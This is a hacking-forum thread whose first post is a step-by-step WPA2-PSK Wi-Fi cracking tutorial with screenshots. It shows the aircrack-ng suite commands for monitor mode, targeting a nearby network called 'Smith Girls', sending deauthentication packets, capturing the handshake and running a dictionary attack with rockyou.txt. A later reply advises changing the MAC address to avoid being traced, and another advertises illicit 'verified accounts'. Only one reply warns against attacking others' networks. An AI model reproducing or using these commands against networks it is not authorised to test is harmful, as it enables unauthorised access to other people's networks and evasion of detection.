Login Register






The issue regarding searched threads returning 404s has been fixed. My apologies. - NekoElf
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) filter_list
Author
Message
WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #1
WPA2/PSK WIFI HACKING TUTORIAL
Requirements


Maybe I'm wrong but I haven't seen any quality tutorials on Sinister for cracking Wifi with Aircrack so I thought I would make one. (If there is correct and link it to me please)

Okay so lets get started.

First you want to open up a terminal and put your network card in monitor mode like this. This allows the network interface card to monitor network traffic and capture data packets being sent from the AP

Code:
airmon-ng start wlan0

[Image: xL843Sn.png]

Then use this command to check to see which network interface you have. My interface is wlan0mon but yours could be different. Whichever interface says monitor mode is the one that your going to want to use

Code:
iwconfig

[Image: HiwSBpo.png]


Then let's scan for targets with this command. The closer the target the better. You can see the range where it say PWR. The lower the number the closer the AP is to you. I'm going to choose the target Smith Girls.

Code:
airodump-ng wlan0mon

[Image: QrkIeju.png]

After you choose your target note the BSSID and the Channel # and type the following to monitor the network traffic. The page will look like the one below. Where the -w part is just the cap file that needs to be saved and used for later. Name it whatever you want.

Code:
airodump-ng -c 8 --bssid 90:48:9A:C4:5B:10 -w sinistertutorial wlan0mon

[Image: 183g9AK.png]

Now leave that terminal alone and open up a new terminal and type the following to send death packets to disassociate the device from the AP so that you can get it to reconnect to capture the handshake. Make sure you have the station number handy! If there is no station number when you are monitoring the network they either do not have any devices connected at the moment or you are to far away from the AP. You can see that the handshake is captured in the top right corner of my terminal.

Code:
aireplay-ng -0 2 -a 90:48:9A:C4:5B:10 -c C8:3A:6B:97:E7:FC wlan0mon

[Image: IOkluzS.png]

Once you obtain a handshake you are ready to start cracking the password with Aircrack. So go ahead and open up a new terminal and type the command below. If the dictionary attack contains the password for the router then you will get a page that looks like this

Code:
aircrack-ng -a2 -b 90:48:9A:C4:5B:10 -w rockyou.txt sinistertutorial-01.cap

[Image: JkqkgRF.png]

The rockyou.txt part is the dictionary file that is built in with Kali LInux that you can use. You can download different dictionary files off the internet and use those if the built in dictionary that Kali Linux offers does not work. Once it runs through the dictionary it will tell you if you found the password or not. In my case it found the password rather quickly.


Hope you guys enjoyed the tutorial. I tried to make it as basic and simple as possible for someone to understand that isn't familiar with Linux.


Turn Off Monitor Mode!


If you don't turn monitor mode back off you cannot browse the internet. Do so by typing the following command

Code:
airmon-ng stop wlan0mon

If your having trouble and the Wifi icon at the top right of the screen is gone then type

Code:
service network-manager restart

After that everything should work perfectly!


Hope you guys enjoyed the tutorial thanks for viewing! If you have any questions PM me!
(This post was last modified: 01-01-2019, 11:09 AM by VilePyromancer.)


Reply

RE: WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #2
Nice tutorial mate. Real simple and short. May I suggest adding just one step? After turning monitor mode on, for its a force of habbit to change my mac address. One can never be too safe, and keeps you from forgetting to change your mac if you decide to connect to any network you just cracked. I sure do miss the good ol'days when everyone mostly used WEP for their networks. Less than 5 min to crack most WEP networks now you dont see one ever.

Reply

RE: WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #3
Damn, I really need linux on my laptop now
My telegram @Hutsom
Need verified accounts? KYC plug

Reply

RE: WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #4
Thanks for the share, but please to everyone who wants to do this with any friend or neighbour, DO NOT do it. Test your skills with your wifi or ask them to test ( friends or neighbour).


Reply

RE: WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #5
(01-08-2019, 03:15 PM)UplayAlts Wrote: Damn, I really need linux on my laptop now

My favorite route these days is a peristant live usb. basically a full install on a pen drive that you can take with you and run off any computer you have access to and able to restart.

Reply

RE: WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #6
(12-24-2018, 08:16 AM)VilePyromancer Wrote:
WPA2/PSK WIFI HACKING TUTORIAL
Requirements


Maybe I'm wrong but I haven't seen any quality tutorials on Sinister for cracking Wifi with Aircrack so I thought I would make one. (If there is correct and link it to me please)

Okay so lets get started.

First you want to open up a terminal and put your network card in monitor mode like this. This allows the network interface card to monitor network traffic and capture data packets being sent from the AP

Code:
airmon-ng start wlan0

[Image: xL843Sn.png]

Then use this command to check to see which network interface you have. My interface is wlan0mon but yours could be different. Whichever interface says monitor mode is the one that your going to want to use

Code:
iwconfig

[Image: HiwSBpo.png]


Then let's scan for targets with this command. The closer the target the better. You can see the range where it say PWR. The lower the number the closer the AP is to you. I'm going to choose the target Smith Girls.

Code:
airodump-ng wlan0mon

[Image: QrkIeju.png]

After you choose your target note the BSSID and the Channel # and type the following to monitor the network traffic. The page will look like the one below. Where the -w part is just the cap file that needs to be saved and used for later. Name it whatever you want.

Code:
airodump-ng -c 8 --bssid 90:48:9A:C4:5B:10 -w sinistertutorial wlan0mon

[Image: 183g9AK.png]

Now leave that terminal alone and open up a new terminal and type the following to send death packets to disassociate the device from the AP so that you can get it to reconnect to capture the handshake. Make sure you have the station number handy! If there is no station number when you are monitoring the network they either do not have any devices connected at the moment or you are to far away from the AP. You can see that the handshake is captured in the top right corner of my terminal.

Code:
aireplay-ng -0 2 -a 90:48:9A:C4:5B:10 -c C8:3A:6B:97:E7:FC wlan0mon

[Image: IOkluzS.png]

Once you obtain a handshake you are ready to start cracking the password with Aircrack. So go ahead and open up a new terminal and type the command below. If the dictionary attack contains the password for the router then you will get a page that looks like this

Code:
aircrack-ng -a2 -b 90:48:9A:C4:5B:10 -w rockyou.txt sinistertutorial-01.cap

[Image: JkqkgRF.png]

The rockyou.txt part is the dictionary file that is built in with Kali LInux that you can use. You can download different dictionary files off the internet and use those if the built in dictionary that Kali Linux offers does not work. Once it runs through the dictionary it will tell you if you found the password or not. In my case it found the password rather quickly.


Hope you guys enjoyed the tutorial. I tried to make it as basic and simple as possible for someone to understand that isn't familiar with Linux.


Turn Off Monitor Mode!


If you don't turn monitor mode back off you cannot browse the internet. Do so by typing the following command

Code:
airmon-ng stop wlan0mon

If your having trouble and the Wifi icon at the top right of the screen is gone then type

Code:
service network-manager restart

After that everything should work perfectly!


Hope you guys enjoyed the tutorial thanks for viewing! If you have any questions PM me!

very nice tutorial Smile
My IT skills that I know perfect is SQL, HTML ,css ,wordpress, PHP.
coding skills that I know is Java, JavaScript and C#

Reply

RE: WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #7
Nice detailed tutorial on cracking WPA2. Problem is to use linux is not easy.. and need to have a PC with linux. Anyway will find time to try it out. Thanks for the nice post!

Reply

RE: WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #8
(02-09-2019, 08:36 PM)muridaa Wrote: Nice detailed tutorial on cracking WPA2. Problem is to use linux is not easy.. and need to have a PC with linux. Anyway will find time to try it out. Thanks for the nice post!

If you have an android phone you can install termux without root, I don't know if this works though, due to the fact that monitor may not work on all androids.
~this post is fictitious; I am playing a persona~

Reply







Users browsing this thread: 8 Guest(s)